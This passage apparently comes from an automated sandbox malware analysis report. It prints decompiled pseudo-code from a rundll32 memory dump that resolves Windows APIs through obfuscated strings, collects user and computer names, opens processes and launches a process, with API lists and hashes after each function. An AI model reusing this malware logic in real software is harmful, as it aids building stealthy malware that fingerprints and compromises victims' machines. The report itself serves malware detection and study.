						_t19 = _t50 + 0x52de747; // 0x7308cef
						_t20 = _t50 + 0x52de0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E052D84D5();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E052D84D5();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x52dd238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E052D9039(_t70);
				goto L12;
			}


















                                                  0x052d2066
                                                  0x052d2066
                                                  0x052d2075
                                                  0x052d207e
                                                  0x052d2081
                                                  0x052d218e
                                                  0x052d2195
                                                  0x052d2195
                                                  0x052d2090
                                                  0x052d2098
                                                  0x052d209d
                                                  0x052d20a0
                                                  0x052d20b5
                                                  0x052d20bb
                                                  0x052d20bc
                                                  0x052d20bf
                                                  0x052d20c5
                                                  0x052d20c8
                                                  0x052d20cd
                                                  0x052d20d5
                                                  0x052d20e1
                                                  0x052d20e5
                                                  0x052d2175
                                                  0x052d20eb
                                                  0x052d20eb
                                                  0x052d20f0
                                                  0x052d20f7
                                                  0x052d210b
                                                  0x052d210f
                                                  0x052d215e
                                                  0x052d2111
                                                  0x052d2112
                                                  0x052d2119
                                                  0x052d2132
                                                  0x052d2134
                                                  0x052d2138
                                                  0x052d213f
                                                  0x052d2159
                                                  0x052d2141
                                                  0x052d214a
                                                  0x052d214f
                                                  0x052d214f
                                                  0x052d213f
                                                  0x052d216d
                                                  0x052d216d
                                                  0x052d20e5
                                                  0x052d217c
                                                  0x052d2185
                                                  0x052d2189
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 052D692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,052D207A,?,00000001,?,?,00000000,00000000), ref: 052D6951
                                                    • Part of subcall function 052D692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 052D6973
                                                    • Part of subcall function 052D692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 052D6989
                                                    • Part of subcall function 052D692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 052D699F
                                                    • Part of subcall function 052D692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 052D69B5
                                                    • Part of subcall function 052D692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 052D69CB
                                                  • memset.NTDLL ref: 052D20C8
                                                    • Part of subcall function 052D95B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,052D23E9,63699BCE,052D1354,73797325), ref: 052D95C2
                                                    • Part of subcall function 052D95B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 052D95DC
                                                  • GetModuleHandleA.KERNEL32(4E52454B,07308CEF,73797325), ref: 052D20FE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 052D2105
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 052D216D
                                                    • Part of subcall function 052D84D5: GetProcAddress.KERNEL32(36776F57,052D21E5), ref: 052D84F0
                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 052D214A
                                                  • CloseHandle.KERNEL32(?), ref: 052D214F
                                                  • GetLastError.KERNEL32(00000001), ref: 052D2153
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                  • String ID:
                                                  • API String ID: 3075724336-0
                                                  • Opcode ID: 64b86911d89ecdf97ad7ed6596ad98e4feece084b41fd63a2a77f7c5d6fcd689
                                                  • Instruction ID: 31f13b6fe970a8801359d175b7e5ae9022918216079124c2629df99827a6b431
                                                  • Opcode Fuzzy Hash: 64b86911d89ecdf97ad7ed6596ad98e4feece084b41fd63a2a77f7c5d6fcd689
                                                  • Instruction Fuzzy Hash: 883117B6D10209FFDB10AFA4D889DAEBBBDAF08254F008469F606A7151DB74AD45CB70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D8307, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 63%
                                                  			E052D8307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x52dd27c; // 0x202a5a8
				_t1 = _t9 + 0x52de62c; // 0x253d7325
				_t36 = 0;
				_t28 = E052D9401(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E052D2049(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E052D7225(_t34, _t41, _a8);
						E052D9039(_t41);
						_t42 = E052D8E82(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E052D9039(_t36);
							_t36 = _t42;
						}
						_t43 = E052D788B(_t36, _t33);
						if(_t43 != 0) {
							E052D9039(_t36);
							_t36 = _t43;
						}
					}
					E052D9039(_t28);
				}
				return _t36;
			}














                                                  0x052d8307
                                                  0x052d830a
                                                  0x052d830b
                                                  0x052d8313
                                                  0x052d831a
                                                  0x052d8321
                                                  0x052d8325
                                                  0x052d832b
                                                  0x052d8332
                                                  0x052d8337
                                                  0x052d8349
                                                  0x052d834d
                                                  0x052d8351
                                                  0x052d8357
                                                  0x052d835c
                                                  0x052d836c
                                                  0x052d836e
                                                  0x052d8385
                                                  0x052d8389
                                                  0x052d838c
                                                  0x052d8391
                                                  0x052d8391
                                                  0x052d839a
                                                  0x052d839e
                                                  0x052d83a1
                                                  0x052d83a6
                                                  0x052d83a6
                                                  0x052d839e
                                                  0x052d83a9
                                                  0x052d83a9
                                                  0x052d83b4

                                                  APIs
                                                    • Part of subcall function 052D9401: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,052D8321,253D7325,00000000,00000000,74ECC740,?,?,052DA428,?), ref: 052D9468
                                                    • Part of subcall function 052D9401: sprintf.NTDLL ref: 052D9489
                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,052DA428,?,073095B0), ref: 052D8332
                                                  • lstrlen.KERNEL32(?,?,?,052DA428,?,073095B0), ref: 052D833A
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • strcpy.NTDLL ref: 052D8351
                                                  • lstrcat.KERNEL32(00000000,?), ref: 052D835C
                                                    • Part of subcall function 052D7225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,052D836B,00000000,?,?,?,052DA428,?,073095B0), ref: 052D723C
                                                    • Part of subcall function 052D9039: HeapFree.KERNEL32(00000000,00000000,052D7F18,00000000,?,?,00000000), ref: 052D9045
                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,052DA428,?,073095B0), ref: 052D8379
                                                    • Part of subcall function 052D8E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,052D8385,00000000,?,?,052DA428,?,073095B0), ref: 052D8E8C
                                                    • Part of subcall function 052D8E82: _snprintf.NTDLL ref: 052D8EEA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                  • String ID: =
                                                  • API String ID: 2864389247-1428090586
                                                  • Opcode ID: c6be631a6f7576058ab6762d8ce1cc6a7290598c045f232154c0558cb944a188
                                                  • Instruction ID: 4cf06d3e0e569a99b209759c0b4ce66ce0e51c8f8391a603b3b0c67ce6f9584b
                                                  • Opcode Fuzzy Hash: c6be631a6f7576058ab6762d8ce1cc6a7290598c045f232154c0558cb944a188
                                                  • Instruction Fuzzy Hash: 7211C633A25625B787127BB5BC8CC7FBA9D9F845617054116F909A7100DE35DD0297F0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D6CC3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(00000000), ref: 052D6D1F
                                                  • SysAllocString.OLEAUT32(0070006F), ref: 052D6D33
                                                  • SysAllocString.OLEAUT32(00000000), ref: 052D6D45
                                                  • SysFreeString.OLEAUT32(00000000), ref: 052D6DA9
                                                  • SysFreeString.OLEAUT32(00000000), ref: 052D6DB8
                                                  • SysFreeString.OLEAUT32(00000000), ref: 052D6DC3
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFree
                                                  • String ID:
                                                  • API String ID: 344208780-0
                                                  • Opcode ID: 62be79a40de23c43a82dfcbfe962e7cb7d61053ed945cdb54a9b98aaadc96cfe
                                                  • Instruction ID: 9ad3dc61fde216e12506818acab91a40b71af53454c83f17f2f3105f7a024e58
                                                  • Opcode Fuzzy Hash: 62be79a40de23c43a82dfcbfe962e7cb7d61053ed945cdb54a9b98aaadc96cfe
                                                  • Instruction Fuzzy Hash: 88316D32D10609AFDB01DFA8D848A9EBBBAAF49210F144425E915EB150DB71A906CBA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D692C, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E052D692C(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E052D2049(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x52dd27c; // 0x202a5a8
					_t1 = _t23 + 0x52de11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x52dd27c; // 0x202a5a8
					_t2 = _t26 + 0x52de769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E052D9039(_t54);
					} else {
						_t30 =  *0x52dd27c; // 0x202a5a8
						_t5 = _t30 + 0x52de756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x52dd27c; // 0x202a5a8
							_t7 = _t33 + 0x52de40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x52dd27c; // 0x202a5a8
								_t9 = _t36 + 0x52de4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x52dd27c; // 0x202a5a8
									_t11 = _t39 + 0x52de779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E052D727B(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                                  0x052d693b
                                                  0x052d693f
                                                  0x052d6a01
                                                  0x052d6945
                                                  0x052d6945
                                                  0x052d694a
                                                  0x052d695d
                                                  0x052d695f
                                                  0x052d6964
                                                  0x052d696c
                                                  0x052d6973
                                                  0x052d6977
                                                  0x052d697a
                                                  0x052d69f9
                                                  0x052d69fa
                                                  0x052d697c
                                                  0x052d697c
                                                  0x052d6981
                                                  0x052d6989
                                                  0x052d698d
                                                  0x052d6990
                                                  0x00000000
                                                  0x052d6992
                                                  0x052d6992
                                                  0x052d6997
                                                  0x052d699f
                                                  0x052d69a3
                                                  0x052d69a6
                                                  0x00000000
                                                  0x052d69a8
                                                  0x052d69a8
                                                  0x052d69ad
                                                  0x052d69b5
                                                  0x052d69b9
                                                  0x052d69bc
                                                  0x00000000
                                                  0x052d69be
                                                  0x052d69be
                                                  0x052d69c3
                                                  0x052d69cb
                                                  0x052d69cf
                                                  0x052d69d2
                                                  0x00000000
                                                  0x052d69d4
                                                  0x052d69da
                                                  0x052d69df
                                                  0x052d69e6
                                                  0x052d69ed
                                                  0x052d69f0
                                                  0x00000000
                                                  0x052d69f2
                                                  0x052d69f5
                                                  0x052d69f5
                                                  0x052d69f0
                                                  0x052d69d2
                                                  0x052d69bc
                                                  0x052d69a6
                                                  0x052d6990
                                                  0x052d697a
                                                  0x052d6a0f

                                                  APIs
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,052D207A,?,00000001,?,?,00000000,00000000), ref: 052D6951
                                                  • GetProcAddress.KERNEL32(00000000,7243775A), ref: 052D6973
                                                  • GetProcAddress.KERNEL32(00000000,614D775A), ref: 052D6989
                                                  • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 052D699F
                                                  • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 052D69B5
                                                  • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 052D69CB
                                                    • Part of subcall function 052D727B: memset.NTDLL ref: 052D72FA
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$AllocateHandleHeapModulememset
                                                  • String ID:
                                                  • API String ID: 1886625739-0
                                                  • Opcode ID: 348448ddc4a14e29420a32c1ec2099d319f4e32488bcfb2b0141390f09c06d5c
                                                  • Instruction ID: 4d6a001f19dc4c41fe84d2ae47ea8cb95ec0fa2b9ae8bcb70f142333fe556c9c
                                                  • Opcode Fuzzy Hash: 348448ddc4a14e29420a32c1ec2099d319f4e32488bcfb2b0141390f09c06d5c
                                                  • Instruction Fuzzy Hash: 8C2165B161160AEFDB60DFB9DC88D56BBECFF18254B014125F549CB281D734E9018B70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D7649, Relevance: 7.6, APIs: 5, Instructions: 81COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E052D7649() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t63;
				short* _t66;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t63 = E052D2049(_v12 + _t43 + 2 << 2);
						if(_t63 != 0) {
							_t47 = _v12;
							_t66 = _t63 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t66,  &_v8) == 0) {
								L7:
								E052D9039(_t63);
							} else {
								 *((short*)(_t66 + _v8 * 2 - 2)) = 0x40;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t66[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x52da33a
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t66, _t56, _t63, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t63[_t57] = 0;
										_v16 = _t63;
									}
								}
							}
						}
					}
				}
				return _v16;
			}














                                                  0x052d7657
                                                  0x052d765a
                                                  0x052d765d
                                                  0x052d7663
                                                  0x052d7668
                                                  0x052d766e
                                                  0x052d7676
                                                  0x052d7679
                                                  0x052d767f
                                                  0x052d7684
                                                  0x052d7691
                                                  0x052d769e
                                                  0x052d76a2
                                                  0x052d76a4
                                                  0x052d76a8
                                                  0x052d76ab
                                                  0x052d76bb
                                                  0x052d770d
                                                  0x052d770e
                                                  0x052d76bd
                                                  0x052d76c0
                                                  0x052d76c7
                                                  0x052d76ca
                                                  0x052d76dd
                                                  0x00000000
                                                  0x052d76df
                                                  0x052d76e2
                                                  0x052d76e7
                                                  0x052d76f5
                                                  0x052d76f8
                                                  0x052d7700
                                                  0x052d7703
                                                  0x00000000
                                                  0x052d7705
                                                  0x052d7705
                                                  0x052d7708
                                                  0x052d7708
                                                  0x052d7703
                                                  0x052d76dd
                                                  0x052d7713
                                                  0x052d7714
                                                  0x052d7684
                                                  0x052d771a

                                                  APIs
                                                  • GetUserNameW.ADVAPI32(00000000,052DA338), ref: 052D765D
                                                  • GetComputerNameW.KERNEL32(00000000,052DA338), ref: 052D7679
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • GetUserNameW.ADVAPI32(00000000,052DA338), ref: 052D76B3
                                                  • GetComputerNameW.KERNEL32(052DA338,?), ref: 052D76D5
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,052DA338,00000000,052DA33A,00000000,00000000,?,?,052DA338), ref: 052D76F8
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                  • String ID:
                                                  • API String ID: 3850880919-0
                                                  • Opcode ID: 3fde8fdf8c9adc18679bec2942ed8ebc04e69bc03bf6f3e413d8eccc89e586b5
                                                  • Instruction ID: f4c189943f989c2b51211fdc912fca7e257bce6ae87ce0ecad31856b11fddbc8
                                                  • Opcode Fuzzy Hash: 3fde8fdf8c9adc18679bec2942ed8ebc04e69bc03bf6f3e413d8eccc89e586b5
                                                  • Instruction Fuzzy Hash: 8021D776910209FBDB11DFA9D989DEEFBB8EE44200B5444AAE506E7240DB349B44DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D1585, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E052D1585(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E052D7F27(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E052DA9AB(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x52dd130() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                                  0x052d1585
                                                  0x052d1592
                                                  0x052d1594
                                                  0x052d15f7
                                                  0x00000000
                                                  0x052d15f7
                                                  0x052d15ac
                                                  0x052d15b3
                                                  0x052d15bf
                                                  0x052d15c4
                                                  0x052d15c6
                                                  0x052d15c8
                                                  0x052d15ca
                                                  0x052d15cc
                                                  0x052d15ce
                                                  0x052d15da
                                                  0x052d15ea
                                                  0x00000000
                                                  0x052d15dc
                                                  0x052d15dc
                                                  0x052d15e3
                                                  0x052d15f0
                                                  0x052d15f0
                                                  0x052d15f0
                                                  0x052d15e3
                                                  0x052d15da
                                                  0x052d15f5
                                                  0x00000000
                                                  0x00000000
                                                  0x052d15fb

                                                  APIs
                                                  • ResetEvent.KERNEL32(?,00000008,?,?,00000102,052D11DA,?,?,00000000,00000000), ref: 052D15BF
                                                  • ResetEvent.KERNEL32(?), ref: 052D15C4
                                                  • GetLastError.KERNEL32 ref: 052D15DC
                                                  • GetLastError.KERNEL32(?,?,00000102,052D11DA,?,?,00000000,00000000), ref: 052D15F7
                                                    • Part of subcall function 052D7F27: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,052D15A4,?,?,?,?,00000102,052D11DA,?,?,00000000), ref: 052D7F33
                                                    • Part of subcall function 052D7F27: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,052D15A4,?,?,?,?,00000102,052D11DA,?), ref: 052D7F91
                                                    • Part of subcall function 052D7F27: lstrcpy.KERNEL32(00000000,00000000), ref: 052D7FA1
                                                  • SetEvent.KERNEL32(?), ref: 052D15EA
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                  • String ID:
                                                  • API String ID: 1449191863-0
                                                  • Opcode ID: 2b4d88ed6eecb8a88834ae84f2f30f72099229cbe1364e14d92ca438efa74264
                                                  • Instruction ID: 8da7544589af7ee5580c1b5d17f6c4a29480e020cf8fa325ff85455e548a8eb0
                                                  • Opcode Fuzzy Hash: 2b4d88ed6eecb8a88834ae84f2f30f72099229cbe1364e14d92ca438efa74264
                                                  • Instruction Fuzzy Hash: 6F01A2311256026BD7306B61EC48F1BFAA9FF443B1F104B25F097E14E0DA24E825DA30
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D8F10, Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E052D8F10(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x52dd26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x52dd25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x52dd258 = _t6;
					 *0x52dd264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x52dd254 = _t7;
					if(_t7 == 0) {
						 *0x52dd254 =  *0x52dd254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}









                                                  0x052d8f18
                                                  0x052d8f20
                                                  0x052d8f25
                                                  0x00000000
                                                  0x052d8f7a
                                                  0x052d8f27
                                                  0x052d8f2f
                                                  0x052d8f37
                                                  0x052d8f37
                                                  0x052d8f77
                                                  0x00000000
                                                  0x052d8f77
                                                  0x052d8f39
                                                  0x052d8f39
                                                  0x052d8f3e
                                                  0x052d8f50
                                                  0x052d8f55
                                                  0x052d8f5b
                                                  0x052d8f63
                                                  0x052d8f68
                                                  0x052d8f6a
                                                  0x052d8f6a
                                                  0x00000000
                                                  0x052d8f71
                                                  0x052d8f33
                                                  0x00000000
                                                  0x00000000
                                                  0x052d8f35
                                                  0x00000000

                                                  APIs
                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,052D6A90,?,?,00000001,?,?,?,052D807D,?), ref: 052D8F18
                                                  • GetVersion.KERNEL32(?,00000001,?,?,?,052D807D,?), ref: 052D8F27
                                                  • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,052D807D,?), ref: 052D8F3E
                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,052D807D,?), ref: 052D8F5B
                                                  • GetLastError.KERNEL32(?,00000001,?,?,?,052D807D,?), ref: 052D8F7A
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                  • String ID:
                                                  • API String ID: 2270775618-0
                                                  • Opcode ID: 974510a3798bf258627a639ad74f07f9706b0376ad93e800f27dff32d7dff813
                                                  • Instruction ID: 69b116feb49a3beb3b924c7760800b07266d05c2c19306ee30f4728d13c23675
                                                  • Opcode Fuzzy Hash: 974510a3798bf258627a639ad74f07f9706b0376ad93e800f27dff32d7dff813
                                                  • Instruction Fuzzy Hash: 3EF03C70AB63429EE7208F64BD1EB24BF66BF447A1F904519F186D61C2DA708441CE34
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D17D5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 88%
                                                  			E052D17D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
